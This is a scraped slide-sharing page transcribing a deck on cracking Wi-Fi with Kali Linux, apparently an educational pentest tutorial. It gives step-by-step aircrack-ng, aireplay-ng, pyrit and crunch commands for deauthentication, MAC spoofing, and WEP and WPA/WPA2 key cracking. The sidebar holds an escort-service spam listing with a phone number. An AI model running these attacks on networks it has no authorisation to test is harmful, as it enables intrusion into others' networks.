Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxVishalSingh1417
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAssociation for Project Management
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingTeacherCyreneCayanan
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104misteraugie
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingTechSoup
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...EduSkills OECD
 

Dernier (20)

Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
social pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajansocial pharmacy d-pharm 1st year by Pragati K. Mahajan
social pharmacy d-pharm 1st year by Pragati K. Mahajan
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy Reform
 
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
IGNOU MSCCFT and PGDCFT Exam Question Pattern: MCFT003 Counselling and Family...
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
APM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across SectorsAPM Welcome, APM North West Network Conference, Synergies Across Sectors
APM Welcome, APM North West Network Conference, Synergies Across Sectors
 
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptxINDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
fourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writingfourth grading exam for kindergarten in writing
fourth grading exam for kindergarten in writing
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy Consulting
 
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
Presentation by Andreas Schleicher Tackling the School Absenteeism Crisis 30 ...
 

Wireless Cracking using Kali

  • 1. Wireless Cracking Using Kali Asish Agarwalla
  • 2. Terminology • SSID (Service Set Identifier) – An SSID is the Name of a Network • BSSID (Basic Service Set Identifier) – MAC address of the access point(AP) • Wireless Client
  • 3. Monitor Mode • Monitor mode allows to monitor all traffic received from the wireless network without having associate with an access point or ad hoc network. • Create a monitor mode interface – airmon-ng start <wlan interface> – Ex: airmon-ng start wlan0
  • 4. Hidden SSID • Passive Mode – Use Wireshark/airodump and wait for any client to connect to AP • airodump-ng --channel <channel> --bssid xx.xx.xx.xx.xx.xx <monitor interface> • Active Mode – Sending de-authentication packets using aireplay and Use Wireshark/airodump to monitor the traffic. – aireplay-ng –deauth 0 –a <bssid> <monitor mode interface> Probe Request and Probe Response packets will contains the SSID of the network.
  • 5. Mac Filtering Bypass • Passive Mode – Use Wireshark/airodump and wait for any client to connect to AP – airodump-ng –channel <channel> --bssid xx.xx.xx.xx.xx.xx <monitor interface> • Active Mode – Force all connected client to authenticate again by sending de- authentication packets using aireplay and use Wireshark/ airodump to monitor the traffic – aireplay-ng –deauth 0 –a <bssid> <monitor mode interface> Once we find a whitelisted client's MAC address, we can spoof the MAC address of the client using the macchanger utility .
  • 6. WEP (Wired Equivalent Privacy) Wireless Security • Two types of WEP authentication – Open System Authentication – Shared Key Authentication • Encrypt all network packages using – a stream-cipher (RC4) for confidentiality – a checksum (CRC-32) for integrity know as ICV • 64 Bit key = 24Bit IV + 40 Bit Key • 128 Bit Key = 24Bit IV + 104 Bit Key
  • 7. WEP Encryption IV(24 Bit) Secret Key(40Bits)+ RC4 Algorithm Data ICV Cipher Text ICV
  • 8. WEP Weakness • IV only 24-bits in WEP, IV must repeat after 2^24 or ~ 16.7M packets • IV sent in clear text • CRC-32 is not cryptographically secure to authenticate the message
  • 9. WEP Cracking 1. Start Monitor Mode: airmon-ng start wlan0 2. Identify the target BSSID, SSID, Channel using airodump-ng: airodump-ng mon0 3. Configured monitor interface to listen on target channel: iwconfig mon0 channel <no> 4. Capture the packer using airodump: airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0 5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0
  • 10. WEP Cracking 6. Send deauth packet to a specific client: aireplay-ng -0 0 -a <BSSID> -c <mac of associated client > mon0 7. Fake authentication: aireplay -1 0 -e ssid -a <bssid> -h <attacker machine /spoof mac address> mon0 8. Generate data packets using Arp Replay: aireplay -3 -b <bssid> -h <attacker machine/connected client mac address> mon0 9. Crack : aircrack-ng <file.cap>
  • 11. WEP Packet Decrypting 1. airdecap-ng -w <Shared Key> <captured_file.cap> 2. The decrypted files are stored in a file named captured_file-dec.cap 3. Open the captured_file-dec.cap using wireshark
  • 12. WPA/WPA2 • WPA uses TKIP encryption algorithm • WPA2 mandatorily uses the AES-CCMP algorithm for encryption • WPA and WPA2 support PSK and EAP-based authentication • WPA/WPA2 PSK is vulnerable to a dictionary attack
  • 13. WPA/WPA2 4 Ways Handshake
  • 14. WPA/WPA2 4 Ways Handshake • Both Client and AP Generate Pairwise Master Key (PMK ) • PMK is derived using the WPA/WPA2 PSK passphrase supplied by the user, along with the SSID. The combination of both of these are sent through the Password Based Key Derivation Function (PBKDF2), which outputs the 256-bit shared key. • The AP sends a psuedo-randomly generated Anonce to the device . • The device generates its own psuedo-random Snonce. • The device then uses these two nonces, the MAC address of the AP, the MAC address of the device, and the PMK, to create a key called the Pairwise Temporal Key (PTK) which is 64 bytes, or 512 bits in length
  • 15. WPA/WPA2 4 Ways Handshake • The device sends his snonce and a MIC to AP • Now AP will calculate the PTK using the same 5 parameter and compare its MIC(message integrity code) with client sent MIC • If both matches AP singed his anonce using PTK and send it along with key installation
  • 17. WPA/WPA2 Cracking 1. Start Monitor Mode: airmon-ng start mon0 2. Identify the target BSSID, SSID, Channel using airodump-ng: airodump-ng mon0 3. Configured monitor interface to listen on target channel: iwconfig mon0 channel <no> 4. Capture the packer using airodump: airodump-ng --bssid <BSSID> --channel <no> -w <filename> mon0 5. Broadcast deauth packets: aireplay-ng -0 0 -a <BSSID> mon0 6. Crack : aircrack-ng -w <password file> <file.cap>
  • 18. Speeding up WPA/WPA2 PSK cracking with PMK • Generate PMK : Genpmk –f <password file> -d <output file> -s “SSID” • cowpatty –d <pmkfile> -s “SSID” -r <captured file> • Crack pyrit: pyrit -r <captured file> -i <pmk file> attack_cowpatty
  • 19. Speeding up WPA/WPA2 PSK cracking with PMK • Import password to pyrit – pyrit -i <password file> import_passwords • Create a essid in pyrit – pyrit -e <ssid> creat_essid • Generate PMK – pyrit batch • Crack using PMK – pyrit -r <captured file> attack_db
  • 20. Password File • crunch <min><max> <letter> -t <guess> • Ex: crunch 10 10 1234567890 -t 98767@@@@@